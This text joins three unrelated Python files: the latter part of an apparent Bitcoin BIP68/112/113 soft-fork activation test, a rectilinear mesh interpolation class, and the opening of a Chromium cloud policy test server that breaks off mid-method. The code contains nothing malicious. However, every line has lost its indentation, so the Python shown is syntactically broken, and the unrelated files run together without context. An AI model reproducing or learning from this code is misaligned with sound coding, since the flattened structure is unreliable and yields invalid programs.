def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(rawtx))
tx.deserialize(f)
return tx
def sign_transaction(self, node, unsignedtx):
rawtx = ToHex(unsignedtx)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def generate_blocks(self, number, version, test_blocks = []):
for i in range(number):
block = self.create_test_block([], version)
test_blocks.append([block, True])
self.last_block_time += 600
self.tip = block.sha256
self.tipheight += 1
return test_blocks
def create_test_block(self, txs, version = 536870912):
block = create_block(self.tip, create_coinbase(self.tipheight + 1), self.last_block_time + 600)
block.nVersion = version
block.vtx.extend(txs)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
return block
def create_bip68txs(self, bip68inputs, txversion, locktime_delta = 0):
txs = []
assert(len(bip68inputs) >= 16)
i = 0
for b31 in range(2):
b25txs = []
for b25 in range(2):
b22txs = []
for b22 in range(2):
b18txs = []
for b18 in range(2):
tx = self.create_transaction(self.nodes[0], bip68inputs[i], self.nodeaddress, Decimal("49.98"))
i += 1
tx.nVersion = txversion
tx.vin[0].nSequence = relative_locktimes[b31][b25][b22][b18] + locktime_delta
b18txs.append(self.sign_transaction(self.nodes[0], tx))
b22txs.append(b18txs)
b25txs.append(b22txs)
txs.append(b25txs)
return txs
def create_bip112special(self, input, txversion):
tx = self.create_transaction(self.nodes[0], input, self.nodeaddress, Decimal("49.98"))
tx.nVersion = txversion
signtx = self.sign_transaction(self.nodes[0], tx)
signtx.vin[0].scriptSig = CScript([-1, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
return signtx
def create_bip112txs(self, bip112inputs, varyOP_CSV, txversion, locktime_delta = 0):
txs = []
assert(len(bip112inputs) >= 16)
i = 0
for b31 in range(2):
b25txs = []
for b25 in range(2):
b22txs = []
for b22 in range(2):
b18txs = []
for b18 in range(2):
tx = self.create_transaction(self.nodes[0], bip112inputs[i], self.nodeaddress, Decimal("49.98"))
i += 1
if (varyOP_CSV): # if varying OP_CSV, nSequence is fixed
tx.vin[0].nSequence = base_relative_locktime + locktime_delta
else: # vary nSequence instead, OP_CSV is fixed
tx.vin[0].nSequence = relative_locktimes[b31][b25][b22][b18] + locktime_delta
tx.nVersion = txversion
signtx = self.sign_transaction(self.nodes[0], tx)
if (varyOP_CSV):
signtx.vin[0].scriptSig = CScript([relative_locktimes[b31][b25][b22][b18], OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
else:
signtx.vin[0].scriptSig = CScript([base_relative_locktime, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
b18txs.append(signtx)
b22txs.append(b18txs)
b25txs.append(b22txs)
txs.append(b25txs)
return txs
def get_tests(self):
long_past_time = int(time.time()) - 600 * 1000 # enough to build up to 1000 blocks 10 minutes apart without worrying about getting into the future
self.nodes[0].setmocktime(long_past_time - 100) # enough so that the generated blocks will still all be before long_past_time
self.coinbase_blocks = self.nodes[0].generate(1 + 16 + 2*32 + 1) # 82 blocks generated for inputs
self.nodes[0].setmocktime(0) # set time back to present so yielded blocks aren't in the future as we advance last_block_time
self.tipheight = 82 # height of the next block to build
self.last_block_time = long_past_time
self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
self.nodeaddress = self.nodes[0].getnewaddress()
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'defined')
test_blocks = self.generate_blocks(61, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 1
# Advanced from DEFINED to STARTED, height = 143
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
# Fail to achieve LOCKED_IN 100 out of 144 signal bit 0
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(50, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(20, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(24, 536936448, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False) # 2
# Failed to advance past STARTED, height = 287
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
# 108 out of 144 signal bit 0 to achieve lock-in
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(58, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(26, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(10, 536936448, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False) # 3
# Advanced from STARTED to LOCKED_IN, height = 431
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# 140 more version 4 blocks
test_blocks = self.generate_blocks(140, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 4
### Inputs at height = 572
# Put inputs for all tests in the chain at height 572 (tip now = 571) (time increases by 600s per block)
# Note we reuse inputs for v1 and v2 txs so must test these separately
# 16 normal inputs
bip68inputs = []
for i in range(16):
bip68inputs.append(self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks))
# 2 sets of 16 inputs with 10 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112basicinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks))
bip112basicinputs.append(inputs)
# 2 sets of 16 varied inputs with (relative_lock_time) OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112diverseinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks))
bip112diverseinputs.append(inputs)
# 1 special input with -1 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112specialinput = self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks)
# 1 normal input
bip113input = self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks)
self.nodes[0].setmocktime(self.last_block_time + 600)
inputblockhash = self.nodes[0].generate(1)[0] # 1 block generated for inputs to be in chain at height 572
self.nodes[0].setmocktime(0)
self.tip = int("0x" + inputblockhash, 0)
self.tipheight += 1
self.last_block_time += 600
assert_equal(len(self.nodes[0].getblock(inputblockhash,True)["tx"]), 82+1)
# 2 more version 4 blocks
test_blocks = self.generate_blocks(2, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 5
# Not yet advanced to ACTIVE, height = 574 (will activate for block 576, not 575)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# Test both version 1 and version 2 transactions for all tests
# BIP113 test transaction will be modified before each use to put in appropriate block time
bip113tx_v1 = self.create_transaction(self.nodes[0], bip113input, self.nodeaddress, Decimal("49.98"))
bip113tx_v1.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v1.nVersion = 1
bip113tx_v2 = self.create_transaction(self.nodes[0], bip113input, self.nodeaddress, Decimal("49.98"))
bip113tx_v2.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v2.nVersion = 2
# For BIP68 test all 16 relative sequence locktimes
bip68txs_v1 = self.create_bip68txs(bip68inputs, 1)
bip68txs_v2 = self.create_bip68txs(bip68inputs, 2)
# For BIP112 test:
# 16 relative sequence locktimes of 10 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_v1 = self.create_bip112txs(bip112basicinputs[0], False, 1)
bip112txs_vary_nSequence_v2 = self.create_bip112txs(bip112basicinputs[0], False, 2)
# 16 relative sequence locktimes of 9 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_9_v1 = self.create_bip112txs(bip112basicinputs[1], False, 1, -1)
bip112txs_vary_nSequence_9_v2 = self.create_bip112txs(bip112basicinputs[1], False, 2, -1)
# sequence lock time of 10 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_v1 = self.create_bip112txs(bip112diverseinputs[0], True, 1)
bip112txs_vary_OP_CSV_v2 = self.create_bip112txs(bip112diverseinputs[0], True, 2)
# sequence lock time of 9 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_9_v1 = self.create_bip112txs(bip112diverseinputs[1], True, 1, -1)
bip112txs_vary_OP_CSV_9_v2 = self.create_bip112txs(bip112diverseinputs[1], True, 2, -1)
# -1 OP_CSV OP_DROP input
bip112tx_special_v1 = self.create_bip112special(bip112specialinput, 1)
bip112tx_special_v2 = self.create_bip112special(bip112specialinput, 2)
### TESTING ###
##################################
### Before Soft Forks Activate ###
##################################
# All txs should pass
### Version 1 txs ###
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = self.sign_transaction(self.nodes[0], bip113tx_v1)
success_txs.append(bip113signed1)
success_txs.append(bip112tx_special_v1)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v1))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v1))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v1))
yield TestInstance([[self.create_test_block(success_txs), True]]) # 6
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### Version 2 txs ###
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = self.sign_transaction(self.nodes[0], bip113tx_v2)
success_txs.append(bip113signed2)
success_txs.append(bip112tx_special_v2)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v2))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v2))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v2))
yield TestInstance([[self.create_test_block(success_txs), True]]) # 7
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# 1 more version 4 block to get us to height 575 so the fork should now be active for the next block
test_blocks = self.generate_blocks(1, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 8
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'active')
#################################
### After Soft Forks Activate ###
#################################
### BIP 113 ###
# BIP 113 tests should now fail regardless of version number if nLockTime isn't satisfied by new rules
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = self.sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = self.sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
yield TestInstance([[self.create_test_block([bip113tx]), False]]) # 9,10
# BIP 113 tests should now pass if the locktime is < MTP
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed1 = self.sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed2 = self.sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
yield TestInstance([[self.create_test_block([bip113tx]), True]]) # 11,12
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Next block height = 580 after 4 blocks of random version
test_blocks = self.generate_blocks(4, 1234)
yield TestInstance(test_blocks, sync_every_block=False) # 13
### BIP 68 ###
### Version 1 txs ###
# All still pass
success_txs = []
success_txs.extend(all_rlt_txs(bip68txs_v1))
yield TestInstance([[self.create_test_block(success_txs), True]]) # 14
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### Version 2 txs ###
bip68success_txs = []
# All txs with SEQUENCE_LOCKTIME_DISABLE_FLAG set pass
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
bip68success_txs.append(bip68txs_v2[1][b25][b22][b18])
yield TestInstance([[self.create_test_block(bip68success_txs), True]]) # 15
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# All txs without flag fail as we are at delta height = 8 < 10 and delta time = 8 * 600 < 10 * 512
bip68timetxs = []
for b25 in range(2):
for b18 in range(2):
bip68timetxs.append(bip68txs_v2[0][b25][1][b18])
for tx in bip68timetxs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 16 - 19
bip68heighttxs = []
for b25 in range(2):
for b18 in range(2):
bip68heighttxs.append(bip68txs_v2[0][b25][0][b18])
for tx in bip68heighttxs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 20 - 23
# Advance one block to 581
test_blocks = self.generate_blocks(1, 1234)
yield TestInstance(test_blocks, sync_every_block=False) # 24
# Height txs should fail and time txs should now pass 9 * 600 > 10 * 512
bip68success_txs.extend(bip68timetxs)
yield TestInstance([[self.create_test_block(bip68success_txs), True]]) # 25
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
for tx in bip68heighttxs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 26 - 29
# Advance one block to 582
test_blocks = self.generate_blocks(1, 1234)
yield TestInstance(test_blocks, sync_every_block=False) # 30
# All BIP 68 txs should pass
bip68success_txs.extend(bip68heighttxs)
yield TestInstance([[self.create_test_block(bip68success_txs), True]]) # 31
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### BIP 112 ###
### Version 1 txs ###
# -1 OP_CSV tx should fail
yield TestInstance([[self.create_test_block([bip112tx_special_v1]), False]]) #32
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 1 txs should still pass
success_txs = []
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
success_txs.append(bip112txs_vary_OP_CSV_v1[1][b25][b22][b18])
success_txs.append(bip112txs_vary_OP_CSV_9_v1[1][b25][b22][b18])
yield TestInstance([[self.create_test_block(success_txs), True]]) # 33
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV, version 1 txs should now fail
fail_txs = []
fail_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v1))
fail_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v1))
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_OP_CSV_v1[0][b25][b22][b18])
fail_txs.append(bip112txs_vary_OP_CSV_9_v1[0][b25][b22][b18])
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 34 - 81
### Version 2 txs ###
# -1 OP_CSV tx should fail
yield TestInstance([[self.create_test_block([bip112tx_special_v2]), False]]) #82
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 2 txs should pass (all sequence locks are met)
success_txs = []
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
success_txs.append(bip112txs_vary_OP_CSV_v2[1][b25][b22][b18]) # 8/16 of vary_OP_CSV
success_txs.append(bip112txs_vary_OP_CSV_9_v2[1][b25][b22][b18]) # 8/16 of vary_OP_CSV_9
yield TestInstance([[self.create_test_block(success_txs), True]]) # 83
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
## SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV for all remaining txs ##
# All txs with nSequence 9 should fail either due to earlier mismatch or failing the CSV check
fail_txs = []
fail_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v2)) # 16/16 of vary_nSequence_9
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_OP_CSV_9_v2[0][b25][b22][b18]) # 16/16 of vary_OP_CSV_9
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 84 - 107
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in nSequence, tx should fail
fail_txs = []
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_nSequence_v2[1][b25][b22][b18]) # 8/16 of vary_nSequence
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 108-115
# If sequencelock types mismatch, tx should fail
fail_txs = []
for b25 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_nSequence_v2[0][b25][1][b18]) # 12/16 of vary_nSequence
fail_txs.append(bip112txs_vary_OP_CSV_v2[0][b25][1][b18]) # 12/16 of vary_OP_CSV
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 116-123
# Remaining txs should pass, just test masking works properly
success_txs = []
for b25 in range(2):
for b18 in range(2):
success_txs.append(bip112txs_vary_nSequence_v2[0][b25][0][b18]) # 16/16 of vary_nSequence
success_txs.append(bip112txs_vary_OP_CSV_v2[0][b25][0][b18]) # 16/16 of vary_OP_CSV
yield TestInstance([[self.create_test_block(success_txs), True]]) # 124
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Additional test, of checking that comparison of two time types works properly
time_txs = []
for b25 in range(2):
for b18 in range(2):
tx = bip112txs_vary_OP_CSV_v2[0][b25][1][b18]
tx.vin[0].nSequence = base_relative_locktime | seq_type_flag
signtx = self.sign_transaction(self.nodes[0], tx)
time_txs.append(signtx)
yield TestInstance([[self.create_test_block(time_txs), True]]) # 125
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### Missing aspects of test
## Testing empty stack fails
if __name__ == '__main__':
BIP68_112_113Test().main()
|
|
# -*- coding: utf-8 -*-
from __future__ import division
__author__ = 'marco.muetze <at> tu-dresden.de'
from .helper import check_bounds_and_get_dimension
from .prototypes import Mesh
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def calculate_bounds(axes):
lower = []
upper = []
num_of_axes = len(axes)
for idx in range(num_of_axes):
if axes[idx][0] < axes[idx][-1]:
lower.append(axes[idx][0])
upper.append(axes[idx][-1])
else:
upper.append(axes[idx][0])
lower.append(axes[idx][-1])
return tuple(lower), tuple(upper)
def calculate_shape(axes):
shape = []
if type(axes) in (tuple, list):
for dim in range(len(axes)):
if type(axes[dim]) is np.ndarray:
shape.append(len(axes[dim]))
else:
raise TypeError
elif type(axes) is np.ndarray:
shape.append(len(axes))
else:
raise TypeError
return tuple(shape)
def calculate_center(bounds):
dimension = check_bounds_and_get_dimension(bounds)
center_position = []
for i in range(dimension):
center_position.append((bounds[1][i] + bounds[0][i]) * 0.5)
return tuple(center_position)
class RectilinearMesh(Mesh):
interpolator = RegularGridInterpolator
def __init__(self, axes, axes_names=('x', 'y', 'z'), unit='m'):
""" RectilinearMesh
:param axes: Values of axis nodes as tuple of 1D np.arrays.
:param axes_names: Coordinate system axes names.
:param unit: Unit of mesh values.
"""
bounds = calculate_bounds(axes)
center = calculate_center(bounds)
shape = calculate_shape(axes)
self.__axes = axes
self.__shape = shape
Mesh.__init__(self, bounds, axes_names=axes_names, unit=unit)
self.__center_index = self.nearest_node(center)[0]
def __getitem__(self, item):
# item umpopeln damit tuple of slice passt!
new_axes = []
# This only works when len(item) equals the dimension of the mesh and will not work for None!
for i, x in enumerate(item):
new_axes.append(self.axes[i][x])
return RectilinearMesh(tuple(new_axes), self.axes_names, self.unit)
def copy(self):
new_axes = []
for axe in self.axes:
new_axes.append(axe.copy())
return RectilinearMesh(tuple(new_axes), self.axes_names, self.unit)
def shift(self, offset):
# Update bounds!
low = np.array(self.bounds[0])
high = np.array(self.bounds[1])
tmp = np.array(offset)
self._bounds = (tuple(low+tmp), tuple(high+tmp))
assert len(offset) == len(self.axes)
new_axes = []
for axe in self.axes:
new_axes.append(axe.copy())
for i, d in enumerate(offset):
new_axes[i] += d
self.__axes = tuple(new_axes)
return self
@property
def pitch(self):
dimension = self._dimension # len(self._axes)
pitch = [0.] * dimension
for dim in range(dimension):
axis_len = len(self.__axes[dim])
# create empty numpy array
coordinates = np.zeros(axis_len-1)
for idx in range(axis_len-1):
coordinates[idx] = (self.__axes[dim][idx+1]-self.__axes[dim][idx])
pitch[dim] = coordinates.copy()
return tuple(pitch)
@property
def axes(self):
return self.__axes
@property
def shape(self):
return self.__shape
@property
def center_index(self):
return self.__center_index
@property
def minimum_pitch(self):
""" Returns the minimal pitch between two neighboring nodes of the mesh in each direction.
:return: Minimal pitch in each direction.
"""
pitch = self.pitch
minimal_pitch = []
for p in pitch:
minimal_pitch.append(min(p))
return min(minimal_pitch)
def nearest_node(self, position):
idx = []
point = []
for i in range(len(self.axes)):
if position[i] < self.bounds[0][i] or position[i] > self.bounds[1][i]:
raise ValueError('The given position is outside the mesh bounds!')
tmp = (np.abs(self.axes[i]-position[i])).argmin()
idx.append(int(tmp))
point.append(self.axes[i][tmp])
return tuple(idx), tuple(point), np.linalg.norm(np.asarray(position)-np.asarray(point))
def surrounding_nodes(self, position):
""" Returns nearest node indices and direction of opposite node.
:param position: Position inside the mesh to search nearest node for as (x,y,z)
:return: Nearest node indices and direction of opposite node.
"""
n_node_index, n_node_position, n_node_error = self.nearest_node(position)
if n_node_error == 0.0:
index_mod = []
for i in range(len(n_node_index)):
new_point = np.asarray(n_node_position)
new_point[i] += 1.e-5*np.abs(new_point[i])
try:
self.nearest_node(tuple(new_point))
index_mod.append(-1)
except ValueError:
index_mod.append(1)
else:
# Check if node_position is larger or smaller in resp. axes than position
index_mod = []
for i in range(len(n_node_index)):
if n_node_position[i] > position[i]:
index_mod.append(-1)
else:
index_mod.append(1)
return tuple(n_node_index), tuple(index_mod)
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A bare-bones test server for testing cloud policy support.
This implements a simple cloud policy test server that can be used to test
chrome's device management service client. The policy information is read from
the file named device_management in the server's data directory. It contains
enforced and recommended policies for the device and user scope, and a list
of managed users.
The format of the file is JSON. The root dictionary contains a list under the
key "managed_users". It contains auth tokens for which the server will claim
that the user is managed. The token string "*" indicates that all users are
claimed to be managed. Other keys in the root dictionary identify request
scopes. The user-request scope is described by a dictionary that holds two
sub-dictionaries: "mandatory" and "recommended". Both these hold the policy
definitions as key/value stores, their format is identical to what the Linux
implementation reads from /etc.
The device-scope holds the policy-definition directly as key/value stores in the
protobuf-format.
Example:
{
"google/chromeos/device" : {
"guest_mode_enabled" : false
},
"google/chromeos/user" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org",
"IncognitoEnabled" : false
},
"recommended" : {
"JavascriptEnabled": false
}
},
"google/chromeos/publicaccount/[email protected]" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org"
},
"recommended" : {
}
},
"managed_users" : [
"secret123456"
],
"current_key_index": 0,
"robot_api_auth_code": "fake_auth_code",
"invalidation_source": 1025,
"invalidation_name": "UENUPOL"
}
"""
import BaseHTTPServer
import cgi
import google.protobuf.text_format
import hashlib
import logging
import os
import random
import re
import sys
import time
import tlslite
import tlslite.api
import tlslite.utils
import tlslite.utils.cryptomath
import urlparse
# The name and availability of the json module varies in python versions.
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
json = None
import asn1der
import testserver_base
import device_management_backend_pb2 as dm
import cloud_policy_pb2 as cp
import chrome_extension_policy_pb2 as ep
# Device policy is only available on Chrome OS builds.
try:
import chrome_device_policy_pb2 as dp
except ImportError:
dp = None
# ASN.1 object identifier for PKCS#1/RSA.
PKCS1_RSA_OID = '\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01'
# SHA256 sum of "0".
SHA256_0 = hashlib.sha256('0').digest()
# List of bad machine identifiers that trigger the |valid_serial_number_missing|
# flag to be set set in the policy fetch response.
BAD_MACHINE_IDS = [ '123490EN400015' ]
# List of machines that trigger the server to send kiosk enrollment response
# for the register request.
KIOSK_MACHINE_IDS = [ 'KIOSK' ]
class PolicyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Decodes and handles device management requests from clients.
The handler implements all the request parsing and protobuf message decoding
and encoding. It calls back into the server to lookup, register, and
unregister clients.
"""
def __init__(self, request, client_address, server):
"""Initialize the handler.
Args:
request: The request data received from the client as a string.
client_address: The client address.
server: The TestServer object to use for (un)registering clients.
"""
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request,
client_address, server)
def GetUniqueParam(self, name):
"""Extracts a unique query parameter from the request.
Args:
name: Names the parameter to fetch.
Returns:
The parameter value or None if the parameter doesn't exist or is not
unique.
"""
if not hasattr(self, '_params'):
self._params = cgi.parse_qs(self.path[self.path.find('?') + 1:])
param_list = self._params.get(name, [])
if len(param_list) == 1:
return param_list[0]
return None
def do_GET(self):
"""Handles GET requests.
Currently this is only used to serve external policy data."""
sep = self.path.find('?')
path = self.path if sep == -1 else self.path[:sep]
if path == '/externalpolicydata':
http_response, raw_reply = self.HandleExternalPolicyDataRequest()
else:
http_response = 404
raw_reply = 'Invalid path'
self.send_response(http_response)
self.end_headers()
self.wfile.write(raw_reply)
def do_POST(self):
http_response, raw_reply = self.HandleRequest()
self.send_response(http_response)
if (http_response == 200):
self.send_header('Content-Type', 'application/x-protobuffer')
self.end_headers()
self.wfile.write(raw_reply)
def HandleExternalPolicyDataRequest(self):
"""Handles a request to download policy data for a component."""
policy_key = self.GetUniqueParam('key')
if not policy_key:
return (400, 'Missing key parameter')
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data is None:
return (404, 'Policy not found for ' + policy_key)
return (200, data)
def HandleRequest(self):
"""Handles a request.
Parses the data supplied at construction time and returns a pair indicating
http status code and response data to be sent back to the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
rmsg = dm.DeviceManagementRequest()
length = int(self.headers.getheader('content-length'))
rmsg.ParseFromString(self.rfile.read(length))
logging.debug('gaia auth token -> ' +
self.headers.getheader('Authorization', ''))
logging.debug('oauth token -> ' + str(self.GetUniqueParam('oauth_token')))
logging.debug('deviceid -> ' + str(self.GetUniqueParam('deviceid')))
self.DumpMessage('Request', rmsg)
request_type = self.GetUniqueParam('request')
# Check server side requirements, as defined in
# device_management_backend.proto.
if (self.GetUniqueParam('devicetype') != '2' or
self.GetUniqueParam('apptype') != 'Chrome' or
(request_type != 'ping' and
len(self.GetUniqueParam('deviceid')) >= 64) or
len(self.GetUniqueParam('agent')) >= 64):
return (400, 'Invalid request parameter')
if request_type == 'register':
return self.ProcessRegister(rmsg.register_request)
if request_type == 'api_authorization':
return self.ProcessApiAuthorization(rmsg.service_api_access_request)
elif request_type == 'unregister':
return self.ProcessUnregister(rmsg.unregister_request)
elif request_type == 'policy' or request_type == 'ping':
return self.ProcessPolicy(rmsg.policy_request, request_type)
elif request_type == 'enterprise_check':
return self.ProcessAutoEnrollment(rmsg.auto_enrollment_request)
else:
return (400, 'Invalid request parameter')
def CreatePolicyForExternalPolicyData(self, policy_key):
"""Returns an ExternalPolicyData protobuf for policy_key.
If there is policy data for policy_key then the download url will be
set so that it points to that data, and the appropriate hash is also set.
Otherwise, the protobuf will be empty.
Args:
policy_key: the policy type and settings entity id, joined by '/'.
Returns:
A serialized ExternalPolicyData.
"""
settings = ep.ExternalPolicyData()
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data:
settings.download_url = urlparse.urljoin(
self.server.GetBaseURL(), 'externalpolicydata?key=%s' % policy_key)
settings.secure_hash = hashlib.sha256(data).digest()
return settings.SerializeToString()
def CheckGoogleLogin(self):
"""Extracts the auth token from the request and returns it. The token may
either be a GoogleLogin token from an Authorization header, or an OAuth V2
token from the oauth_token query parameter. Returns None if no token is
present.
"""
oauth_token = self.GetUniqueParam('oauth_token')
if oauth_token:
return oauth_token
match = re.match('GoogleLogin auth=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
return match.group(1)
return None
def ProcessRegister(self, msg):
"""Handles a register request.
Checks the query for authorization and device identifier, registers the
device with the server and constructs a response.
Args:
msg: The DeviceRegisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the auth token and device ID.
auth = self.CheckGoogleLogin()
if not auth:
return (403, 'No authorization')
policy = self.server.GetPolicies()
if ('*' not in policy['managed_users'] and
auth not in policy['managed_users']):
return (403, 'Unmanaged')
device_id = self.GetUniqueParam('deviceid')
if not device_id:
return (400, 'Missing device identifier')
token_info = self.server.RegisterDevice(device_id,
msg.machine_id,
msg.type)
# Send back the reply.
response = dm.DeviceManagementResponse()
response.register_response.device_management_token = (
token_info['device_token'])
response.register_response.machine_name = token_info['machine_name']
response.register_response.enrollment_type = token_info['enrollment_mode']
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def ProcessApiAuthorization(self, msg):
"""Handles an API authorization request.
Args:
msg: The DeviceServiceApiAccessRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
policy = self.server.GetPolicies()
# Return the auth code from the config file if it's defined,
# else return a descriptive default value.
response = dm.DeviceManagementResponse()
response.service_api_access_response.auth_code = policy.get(
'robot_api_auth_code', 'policy_testserver.py-auth_code')
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def ProcessUnregister(self, msg):
"""Handles a register request.
Checks for authorization, unregisters the device and constructs the
response.
Args:
msg: The DeviceUnregisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
